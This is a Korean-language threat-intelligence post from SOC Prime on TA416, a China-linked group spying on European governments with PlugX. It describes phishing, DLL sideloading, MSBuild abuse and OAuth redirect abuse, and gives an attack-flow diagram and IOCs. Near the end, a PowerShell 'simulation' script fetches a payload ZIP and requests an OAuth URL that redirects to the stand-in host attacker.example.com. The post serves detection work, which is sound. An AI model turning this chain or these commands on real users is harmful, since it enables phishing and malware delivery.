SOC Prime Bias: 긴급

08 4월 2026 14:40
newspaper icon Proofpoint

다시 EU로 돌아가고 싶습니다: TA416, 유럽 정부를 대상으로 한 스파이 활동 재개

Author Photo
Ruslan Mikhalov SOC Prime에서 위협 연구 책임자 linkedin icon 팔로우
다시 EU로 돌아가고 싶습니다: TA416, 유럽 정부를 대상으로 한 스파이 활동 재개
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


요약

TA416은 중국과 연계된 위협 행위자이며, 2025년 중반에 활동이 감소한 이후 유럽 정부 및 외교 기관을 다시 타겟으로 삼기 시작했습니다. 행위자는 가벼운 웹 버그 탐색과 맞춤화된 PlugX 백도어 전달을 혼합하고, 초기에 액세스하기 위해 가짜 Cloudflare Turnstile 스타일의 미끼, OAuth 리다이렉션 남용, MSBuild 기반 다운로더를 포함한 체인들을 회전시킵니다. 2026년 3월까지, 보고에 따르면 동일한 전략이 이란과 연관된 지역적인 긴장이 고조됨에 따라 중동 외교 타겟으로 확대되었습니다. 캠페인은 손상된 메일함, DLL 사이드로딩을 위한 서명된 Windows 바이너리, 빠르게 쇄신되는 명령 및 제어 인프라에 의존하고 있습니다.

조사

Proofpoint는 무료 이메일 주소 및 손상된 정부 계정으로 보낸 여러 피싱 파악 물결을 추적하고 있으며, 추적 픽셀 또는 무기화된 아카이브를 사용하고 있습니다. 아카이브 기반 체인은 ZIP 스머글링과 LNK 아티팩트를 사용하여 MSI 또는 TAR 패키지를 배치하고, 이후 서명된 실행 파일을 실행하여 PlugX를 사이드로딩합니다. 동시에, TA416은 Microsoft Entra ID OAuth 리다이렉션을 남용하고 악성 C# 프로젝트 파일과 쌍으로 MSBuild 바이너리 이름을 변경하여 페이로드를 검색하고 실행합니다. C2 트래픽은 HTTP로 RC4 암호화된 메시지와 요청 및 응답을 조형하는 특별한 헤더/쿠키 패턴을 통해 관찰되었습니다.

완화

강력한 이메일 인증을 적용하고 알 수 없는 클라우드 스토리지 제공업체에서 소스된 들어오는 콘텐츠에 대한 제어를 강화하십시오. 사이드로딩에 일반적으로 악용되는 서명된 바이너리의 의심스러운 실행을 모니터링하고(예: cnmpaui.exe 및 steam_monitor.exe), 비정상적인 DLL 검색 순서 행동을 경고합니다. 암호화된 C2와 관련된 비정상적인 HTTP 헤더 또는 쿠키 서명에 대한 탐지를 추가하고 가능한 경우 알려진 TA416 도메인/IP를 차단합니다. 새로 생성된 Run 키 지속성과 공개 또는 공유 디렉토리로의 예기치 않은 파일 쓰기에 대한 엔드포인트 모니터링을 강화하십시오.

응답

활동이 감지되면 호스트를 격리하고 휘발성 메모리를 캡처하며, 범위를 정의하기 위해 관련 엔드포인트 및 메일 로그를 보존하십시오. CNCLID.dll 로더, Canon.dat 쉘코드, dGcEuQhKT 뮤텍스 등 PlugX 아티팩트를 사냥합니다. 손상된 이메일 계정에 대한 액세스를 취소하고 자격 증명을 재설정하며 예약된 작업 또는 다른 지속성 메커니즘을 제거합니다. RC4 암호화된 HTTP 비콘 탐지에 대한 네트워크 원격 분석을 분석한 다음, 관련 도메인/URL을 차단하고 환경 전반에 걸쳐 사냥을 확장하십시오.

"graph TB %% Class Definitions Section classDef action fill:#ffcccc classDef tool fill:#ccccff classDef malware fill:#ffcc99 classDef process fill:#ccffcc %% Nodes action_initial_access["<b>Action</b> – T1566 피싱: 손상된 계정과 일반적인 피싱에서 발송된 피싱 이메일. 수신자는 악성 링크를 클릭합니다."] class action_initial_access action tool_phishing_email["<b>도구</b> – <b>이름</b>: 피싱 이메일<br/><b>기법</b>: T1566"] class tool_phishing_email tool action_user_execution["<b>Action</b> – T1204 사용자 실행: 피해자가 악성 ZIP 다운로드로 이어지는 악성 URL을 클릭합니다."] class action_user_execution action tool_malicious_zip["<b>도구</b> – <b>이름</b>: LNK 바로 가기가 포함된 악성 ZIP 아카이브"] class tool_malicious_zip tool action_lnk_smuggling["<b>Action</b> – T1027.012 LNK 아이콘 스머글링: LNK 바로 가기가 PowerShell 스크립트를 실행합니다."] class action_lnk_smuggling action process_powershell["<b>과정</b> – 서명된 바이너리를 추출하기 위한 PowerShell 실행"] class process_powershell process tool_signed_binary["<b>도구</b> – <b>이름</b>: cnmpaui.exe (서명된 합법적 바이너리)"] class tool_signed_binary tool action_dll_sideloading["<b>Action</b> – T1218 시스템 바이너리 대리 실행: DLL 사이드로딩이 악성 DLL을 로드합니다."] class action_dll_sideloading action malware_malicious_dll["<b>멀웨어</b> – 사이드로딩을 통해 로드된 악성 DLL"] class malware_malicious_dll malware action_msbuild_execution["<b>Action</b> – T1127.001 신뢰할 수 있는 개발자 유틸리티 대리 실행: MSBuild가 PlugX 다운로드 및 실행에 사용됨."] class action_msbuild_execution action tool_msbuild["<b>도구</b> – <b>이름</b>: 이름이 바뀐 MSBuild 실행 파일"] class tool_msbuild tool tool_csharp_project["<b>도구</b> – <b>이름</b>: 악성 C# 프로젝트 파일"] class tool_csharp_project tool malware_plugx["<b>멀웨어</b> – PlugX 페이로드"] class malware_plugx malware action_persistence["<b>Action</b> – T1037.001 Run 레지스트리 키 및 바로 가기 수정으로 인한 지속성."] class action_persistence action process_registry["<b>과정</b> – HKCUSoftwareMicrosoftWindowsCurrentVersionRun 아래에 Run 레지스트리 키 생성"] class process_registry process action_defense_evasion["<b>Action</b> – T1553.002 신뢰 제어 전복: 서명된 실행 파일 남용 및 강력한 혼돈화."] class action_defense_evasion action action_apddomain_hijack["<b>Action</b> – T1574.014 실행 흐름 하이잭: MSBuild 체인을 통한 AppDomainManager 하이잭"] class action_apddomain_hijack action action_c2["<b>Action</b> – T1071.001 웹 프로토콜 및 T1573.001 암호화된 채널: RC4 암호화 내 웹 프로토콜 내의 웹 C2"] class action_c2 action process_c2_communication["<b>과정</b> – C2 서버와의 암호화된 HTTP 통신"] class process_c2_communication process action_exfiltration["<b>Action</b> – T1041 C2 채널을 통한 데이터 유출: 암호화된 채널을 통해 데이터 송신"] class action_exfiltration action %% Connections action_initial_access –>|delivers| tool_phishing_email tool_phishing_email –>|contains link leading to| action_user_execution action_user_execution –>|downloads| tool_malicious_zip tool_malicious_zip –>|contains| action_lnk_smuggling action_lnk_smuggling –>|executes| process_powershell process_powershell –>|extracts| tool_signed_binary tool_signed_binary –>|loads| action_dll_sideloading action_dll_sideloading –>|loads| malware_malicious_dll malware_malicious_dll –>|prepares environment for| action_msbuild_execution action_msbuild_execution –>|uses| tool_msbuild tool_msbuild –>|processes| tool_csharp_project tool_csharp_project –>|downloads and runs| malware_plugx malware_plugx –>|creates| action_persistence action_persistence –>|writes| process_registry action_persistence –>|modifies shortcut for| action_lnk_smuggling action_persistence –>|enables| action_defense_evasion action_defense_evasion –>|applies| action_apddomain_hijack action_apddomain_hijack –>|enables| action_c2 action_c2 –>|communicates via| process_c2_communication process_c2_communication –>|exfiltrates data via| action_exfiltration "

공격 흐름

시뮬레이션 실행

전제 조건: 텔레메트리 및 기준선 사전 검사기가 통과해야 합니다.

이유: 이 섹션은 탐지 규칙을 트리거하기 위해 설계된 적대적 기술 (TTP)의 정확한 실행을 자세히 설명합니다. 명령과 내러티브는 식별된 TTP를 직접 반영하고 탐지 논리에 의해 예상되는 정확한 텔레메트리를 생성하는 것을 목표로 합니다.

  • 공격 내러티브 및 명령:

    1. 페이로드 준비: 공격자는 악성 ZIP 파일을 업로드합니다 (payload.zip) Azure Blob 컨테이너에 mydownload.z29.web.core.windows.net.
    2. 미끼 페이지 제작: 동일한 도메인에 호스팅된 악성 HTML 페이지에는 <img> 태그가 포함되어 있어 Azure Blob URL로 연결되며 다운로드를 트리거합니다. and 숨겨진 <iframe> 이 즉시 피해자를 Microsoft Entra ID OAuth 2.0 인증 엔드포인트로 리다이렉션하고 redirect_uri 가 공격자 제어 도메인을 가리킵니다.
    3. 피해자 상호작용: 피해자가 미끼 페이지를 방문합니다 (예: 피싱 이메일을 통해). 브라우저는 불러오기 URL을 위한 두 개의 HTTP GET 요청 을 빠르게 실행하여 OAuth URL을 요청합니다. Azure 활동 로그에는 동일한 프록시 세션 아래에서 두 요청이 모두 기록되어 규칙의 selection_blob AND selection_oauth 조건이 만족됩니다.

  • 회귀 테스트 스크립트: (텔레메트리를 재생성하기 위해 피해자 시스템에서 실행)

    # TA416 Azure Blob + OAuth 트리거 시뮬레이션
# 1단계: 악성 Blob 다운로드 (안전한 파일로 시뮬레이션)
Invoke-WebRequest -Uri "https://mydownload.z29.web.core.windows.net/payload.zip" -OutFile "$env:TEMPpayload.zip"

# 2단계: 즉시 OAuth 인증 URL 호출 (리다이렉션 시뮬레이션)
$oauthUrl = "https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=FAKE_CLIENT_ID&response_type=code&redirect_uri=https://attacker.example.com/callback"
Invoke-WebRequest -Uri $oauthUrl -Method GET -UseBasicParsing | Out-Null

Write-Host "시뮬레이션 완료 - 두 URL 모두 요청됨."

  • 정리 명령:

    # 다운로드한 파일 제거
Remove-Item -Path "$env:TEMPpayload.zip" -Force -ErrorAction SilentlyContinue

# PowerShell 세션 변수 정리
Remove-Variable -Name oauthUrl -ErrorAction SilentlyContinue

SOC Prime의 Detection as Code 플랫폼에 가입하세요 귀사의 비즈니스에 가장 중요한 위협에 대한 가시성을 개선하세요. 시작을 돕고 즉각적인 가치를 제공하기 위해 지금 SOC Prime 전문가와의 회의를 예약하세요.

무료 가입